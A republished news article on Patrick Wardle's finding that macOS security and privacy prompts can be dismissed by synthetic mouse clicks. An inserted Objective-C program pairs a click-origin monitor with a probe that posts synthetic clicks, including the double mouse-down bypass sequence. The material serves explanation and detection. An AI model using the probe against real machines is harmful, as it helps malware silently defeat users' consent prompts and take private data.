25 September 2023

Core problems at Apple: How malware is defeating IT giant’s defences


Dan Goodin* finds that malware has no trouble hiding from and bypassing macOS user warnings and can do ‘a lot of malicious stuff’.


Apple works hard to make its software secure.

Beyond primary protections that prevent malware infections in the first place, company engineers also build a variety of defence-in-depth measures.

Now, Patrick Wardle, a former National Security Agency hacker and macOS security expert, has exposed a major shortcoming that generically affects many of these secondary defences.

In a presentation at the Def Con hacker convention in Las Vegas, Mr Wardle said it was easy for a local attacker or malware to bypass many security mechanisms.

When these security measures detect a potentially malicious action, they will block that action and then display an alert or warning.

By abusing programming interfaces built into macOS, such as the Core Graphics event APIs that let a process post mouse and keyboard events, malicious code can generate a programmatic click to interact with, or even dismiss, such alerts.

This “synthetic click,” as Mr Wardle called it, works almost immediately and can be done in a way that is invisible to the user.

“The ability to synthetically interact with a myriad of security prompts allows you to perform a lot of malicious actions,” Mr Wardle said.

“Many of Apple’s privacy and security-in-depth protections can be trivially bypassed.”

With the ability to generate synthetic clicks, an attack, for example, could dismiss many of Apple’s privacy-related security prompts.

On recent versions of macOS, Apple has added a confirmation window that requires the user to click an OK button before an installed app can access sensitive user data, such as contacts or calendar entries, stored on the Mac.

Apple engineers added the requirement to act as a secondary safeguard.

The thinking went that even if a machine was infected by malware, the malicious app wouldn’t be able to copy this sensitive data without the owner’s explicit permission.

Though many of Apple’s security alerts attempt to detect and ignore synthetic clicks, Mr Wardle discovered that the privacy alerts were not protected.

“What is the point of displaying an alert, if malware can simply dismiss it?” he asked.

In the past, malware has abused such synthetic clicks to perform a variety of nefarious actions.

For example, the sneaky Genieo adware, the DevilRobber currency-mining malware, and the insidious Fruitfly malware, which stole millions of images from infected Macs over a 13-year period.

All used synthetic clicks to bypass defence-in-depth warnings.

Apple responded to this by improving the security of its operating system.

Now, in recent versions of macOS, security alerts and prompts will ignore synthetic events.

At least that was the idea.

In his presentation, Mr Wardle first illustrated how an attacker could abuse a feature of macOS called ‘mouse keys’ that would convert keyboard keypresses into mouse movements.

Mouse keys let a user move a mouse up, down, to the right or left, or in diagonal directions by pressing certain keys.

However, Mr Wardle illustrated how an attacker or malware could also leverage mouse key events to generate synthetic mouse clicks that would be accepted, even by protected security alerts.

He reported the issue to Apple, which patched it as CVE-2017-7150 in the macOS High Sierra 10.13 Supplemental Update.

Now mouse keys are ignored by security alerts, and keychain access always requires a user’s password.

Even after Apple issued the patch, the warnings could still be bypassed.

While testing an older attack, Mr Wardle incorrectly copied and pasted some code.

Without realising the mistake, he ran the code, which to his amazement allowed him to post synthetic clicks to security alerts, even on a fully patched High Sierra system.

He realised his buggy code was sending two mouse ‘down’ events, instead of the usual mouse-down followed by mouse-up.

“The system converts the second mouse down event to a mouse up event,” he said.

“Since this mouse up event is generated by the system, it is allowed to interact with security prompts.”

As a result of this issue, Mr Wardle was able to completely bypass the warnings when doing a variety of things that have serious security and privacy consequences.
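The two halves of what the article describes, the synthetic click posted through the Core Graphics event API and a detector that looks at where a click came from, as an added example written for this page (it is not code from the article or from Mr Wardle’s talk). The `monitor` and `probe` command names are this example’s own. It assumes the binary has been granted the Accessibility or Input Monitoring permission that event taps require, and it treats the event’s source-state and source-PID fields as a heuristic for separating synthetic events from hardware ones, not as an Apple-documented check.

```objective-c
// synthclick.m -- added example, not from the article or from Patrick Wardle's code.
//   ./synthclick monitor           install a listen-only event tap and classify left clicks
//   ./synthclick probe X Y         post a normal synthetic left click at screen point (X, Y)
//   ./synthclick probe X Y double  post mouse-down twice, the sequence the talk describes
// Build: clang -framework ApplicationServices -framework Foundation -o synthclick synthclick.m
// Assumptions: the tap needs Accessibility / Input Monitoring permission; "non-HID source
// state" and "source PID" are heuristics, since a generator can forge the state with
// CGEventSourceCreate(kCGEventSourceStateHIDSystemState).
#import <ApplicationServices/ApplicationServices.h>
#import <Foundation/Foundation.h>
#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

static CFMachPortRef gTap;   // kept so the callback can re-arm the tap if macOS disables it

static const char *typeName(CGEventType t) {
    switch (t) {
        case kCGEventLeftMouseDown:          return "LeftMouseDown";
        case kCGEventLeftMouseUp:            return "LeftMouseUp";
        case kCGEventTapDisabledByTimeout:   return "TapDisabledByTimeout";
        case kCGEventTapDisabledByUserInput: return "TapDisabledByUserInput";
        default:                             return "Other";
    }
}

// Hardware clicks carry the HID system source state. Clicks posted by a user-space
// process usually do not, and the source PID field names the posting process. Log both
// and treat a mismatch as a lead to investigate, not as proof.
static CGEventRef tapCallback(CGEventTapProxy proxy, CGEventType type,
                              CGEventRef event, void *refcon) {
    if (type == kCGEventTapDisabledByTimeout || type == kCGEventTapDisabledByUserInput) {
        CGEventTapEnable(gTap, true);   // the OS disables taps that stall; re-enable
        return event;
    }
    int64_t state = CGEventGetIntegerValueField(event, kCGEventSourceStateID);
    int64_t pid   = CGEventGetIntegerValueField(event, kCGEventSourceUnixProcessID);
    CGPoint p     = CGEventGetLocation(event);
    const char *verdict = (state == kCGEventSourceStateHIDSystemState) ? "hardware?" : "SYNTHETIC?";
    printf("%-14s at (%.0f,%.0f) sourceState=%lld sourcePID=%lld -> %s\n",
           typeName(type), p.x, p.y, (long long)state, (long long)pid, verdict);
    return event;   // listen-only tap: never swallow the event
}

static int runMonitor(void) {
    CGEventMask mask = CGEventMaskBit(kCGEventLeftMouseDown) | CGEventMaskBit(kCGEventLeftMouseUp);
    gTap = CGEventTapCreate(kCGSessionEventTap, kCGHeadInsertEventTap,
                            kCGEventTapOptionListenOnly, mask, tapCallback, NULL);
    if (!gTap) {
        fprintf(stderr, "CGEventTapCreate failed: grant this binary Accessibility / "
                        "Input Monitoring in System Settings and retry\n");
        return 1;
    }
    CFRunLoopSourceRef src = CFMachPortCreateRunLoopSource(kCFAllocatorDefault, gTap, 0);
    CFRunLoopAddSource(CFRunLoopGetCurrent(), src, kCFRunLoopCommonModes);
    CGEventTapEnable(gTap, true);
    printf("monitoring left-button events; Ctrl-C to stop\n");
    CFRunLoopRun();
    return 0;
}

// Post the click the article describes. With doubleDown the second event is another
// mouse-down rather than a mouse-up; on High Sierra the talk reported that the system
// turned that second down into a system-generated up which protected prompts accepted.
// Later macOS releases reject the sequence, so aim the probe at a harmless window and
// watch what the monitor records for each event.
static int runProbe(double x, double y, bool doubleDown) {
    CGPoint pt = CGPointMake(x, y);
    CGEventRef down = CGEventCreateMouseEvent(NULL, kCGEventLeftMouseDown, pt, kCGMouseButtonLeft);
    CGEventRef up   = CGEventCreateMouseEvent(NULL, kCGEventLeftMouseUp,   pt, kCGMouseButtonLeft);
    CGEventPost(kCGHIDEventTap, down);
    CGEventPost(kCGHIDEventTap, doubleDown ? down : up);
    CFRelease(down);
    CFRelease(up);
    return 0;
}

int main(int argc, char **argv) {
    @autoreleasepool {
        if (argc >= 2 && strcmp(argv[1], "monitor") == 0)
            return runMonitor();
        if (argc >= 4 && strcmp(argv[1], "probe") == 0)
            return runProbe(atof(argv[2]), atof(argv[3]),
                            argc >= 5 && strcmp(argv[4], "double") == 0);
        fprintf(stderr, "usage: %s monitor | probe X Y [double]\n", argv[0]);
        return 2;
    }
}
```

Run `monitor` in one terminal, click with the real mouse, then run `probe` from another terminal and compare the two lines: the hardware click should show the HID source state, the posted one the probe’s own PID. The limitation is the one the article’s second bug illustrates: anything the system itself synthesises on a process’s behalf (the converted mouse-up) no longer looks like it came from that process, which is why a source-field check alone is not a defence.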

Apple representatives didn’t respond to an email seeking comment for this post.

Mr Wardle, for his part, said the bypass raises questions about how the company rolled out the improvements.

“I wasn’t trying to find a bypass, but I uncovered a way to fully break a foundational security mechanism,” he said.

“If a security mechanism falls over so easily, did they not test this? I’m almost embarrassed to talk about it.”

* Dan Goodin is the Security Editor at Ars Technica. He tweets at @dangoodin001.

This article first appeared at arstechnica.com.
